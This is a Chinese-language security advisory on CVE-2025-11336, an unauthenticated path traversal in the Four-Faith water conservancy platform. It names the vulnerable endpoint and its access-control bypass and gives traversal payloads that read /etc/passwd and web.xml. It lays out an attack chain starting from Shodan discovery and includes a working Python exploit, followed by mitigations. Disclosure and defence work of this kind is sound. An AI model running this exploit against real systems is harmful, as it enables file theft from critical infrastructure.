CVE-2025-11336：四信水利信息化平台路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-11336

漏洞类型

路径遍历（Path Traversal）

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Four-Faith Water Conservancy Informatization Platform（四信水利信息化平台）

漏洞概述

CVE-2025-11336 是四信（Four-Faith）水利信息化平台（Water Conservancy Informatization Platform）2.2 及以下版本中存在的一个路径遍历（Path Traversal）安全漏洞。该漏洞存在于文件下载接口 /stAlarmConfigure/index.do/../../aloneReport/download.do;otherlogout.do 中，攻击者可以通过操控 fileName 参数实现目录穿越，从而读取服务器上的任意文件。

该漏洞的 CVSS 3.1 评分为 5.3，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N）和用户交互（UI:N），可远程发起攻击。漏洞对机密性影响为低（C:L），对完整性和可用性无影响（I:N, A:N）。

该漏洞已被公开披露，PoC 已发布在 GitHub 上（rookie1006/CVE），且供应商在收到漏洞通知后未做出任何回应，这进一步增加了该漏洞被利用的风险。由于平台通常涉及水利监控等关键基础设施，该漏洞可能导致敏感配置文件、日志文件或系统凭据泄露，对水利信息系统的安全性构成潜在威胁。

技术细节

该漏洞属于经典的路径遍历（Path Traversal）漏洞，漏洞根源在于四信水利信息化平台的文件下载功能未对用户输入的文件名参数进行充分的验证和过滤。

具体技术细节如下：

1. **漏洞入口**：受影响的接口路径为 /stAlarmConfigure/index.do/../../aloneReport/download.do;otherlogout.do。该路径利用了分号（;）和目录穿越（../）的特殊处理方式，分号在某些 Java EE 容器（如 Tomcat）中用于分隔路径和参数，攻击者利用这一特性绕过访问控制。

2. **触发参数**：漏洞通过操控 fileName 参数实现。攻击者可以构造包含 ../ 序列的恶意路径，如 fileName=../../../../etc/passwd 或 fileName=../../../../windows/win.ini 等。

3. **利用方式**：攻击者向目标服务器发送精心构造的 HTTP 请求，通过在 fileName 参数中嵌入目录遍历序列，绕过应用程序的路径限制，访问 Web 根目录之外的文件系统。由于服务器未对路径进行规范化处理或白名单校验，恶意路径被直接用于文件读取操作。

4. **影响范围**：该漏洞允许未认证的远程攻击者读取服务器上的任意文件，可能泄露数据库凭据、系统配置文件、源代码等敏感信息。虽然漏洞本身仅影响机密性（C:L），但泄露的敏感信息可能被用于进一步的攻击，如权限提升或横向移动。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过网络空间搜索引擎（如Shodan、ZoomEye）或资产测绘工具识别暴露在公网的四信水利信息化平台，确认目标系统版本为2.2及以下。

STEP 2

步骤2：构造恶意请求

攻击者构造包含路径遍历序列的HTTP请求，目标是 /stAlarmConfigure/index.do/../../aloneReport/download.do;otherlogout.do 接口，在 fileName 参数中注入 ../ 序列。

STEP 3

步骤3：发送攻击请求

攻击者通过工具（如curl、Python脚本或Burp Suite）向目标服务器发送恶意请求，无需任何认证即可访问。

STEP 4

步骤4：读取敏感文件

服务器未对路径进行充分验证，直接使用恶意构造的路径读取文件，攻击者成功获取系统敏感文件内容（如配置文件、密码文件、源代码等）。

STEP 5

步骤5：信息利用与进一步攻击

攻击者利用泄露的敏感信息（如数据库凭据、系统配置）进行更深层次的攻击，如权限提升、横向移动或数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11336 - Four-Faith Water Conservancy Informatization Platform Path Traversal PoC
# Vulnerability: Path Traversal via fileName parameter in download endpoint
# Affected: Four-Faith Water Conservancy Informatization Platform <= 2.2

import requests

TARGET_URL = "http://target-host:8080"
VULNERABLE_PATH = "/stAlarmConfigure/index.do/../../aloneReport/download.do;otherlogout.do"

def exploit_path_traversal(target_url, traversal_depth=4, target_file="etc/passwd"):
    """
    Exploit path traversal vulnerability to read arbitrary files
    """
    # Construct traversal path
    traversal = "../" * traversal_depth
    malicious_filename = f"{traversal}{target_file}"

    # Build full URL
    full_url = f"{target_url}{VULNERABLE_PATH}"

    # Send exploit request
    params = {"fileName": malicious_filename}
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "*/*"
    }

    try:
        response = requests.get(full_url, params=params, headers=headers, timeout=10)
        print(f"[*] Target: {target_url}")
        print(f"[*] Payload: fileName={malicious_filename}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.content)} bytes")
        print(f"[*] Response Content:\n{response.text[:2000]}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    # Example: Read /etc/passwd on Linux
    exploit_path_traversal(TARGET_URL, traversal_depth=5, target_file="etc/passwd")

    # Example: Read Windows system files
    # exploit_path_traversal(TARGET_URL, traversal_depth=4, target_file="windows/win.ini")

    # Example: Read application configuration files
    # exploit_path_traversal(TARGET_URL, traversal_depth=3, target_file="WEB-INF/web.xml")

影响范围

Four-Faith Water Conservancy Informatization Platform <= 2.2

防御指南

临时缓解措施

在等待官方修复之前，建议采取以下临时缓解措施：1）在Web服务器或反向代理层面配置规则，拦截包含 ../ 序列的URL请求；2）通过防火墙限制四信水利信息化平台管理接口的访问来源，仅允许可信IP地址访问；3）修改应用配置，限制文件下载功能只能访问特定目录下的文件；4）监控系统日志，关注异常的下载请求和文件访问行为；5）及时联系四信厂商催促修复，并考虑使用其他安全的产品替代。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11336
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11336
3 Details https://www.cvedetails.com/cve/CVE-2025-11336/
4 VulDB https://vuldb.com/cve/CVE-2025-11336
5 Link https://github.com/rookie1006/CVE/issues/1
6 Link https://vuldb.com/?ctiid.327219
7 Link https://vuldb.com/?id.327219
8 Link https://vuldb.com/?submit.664612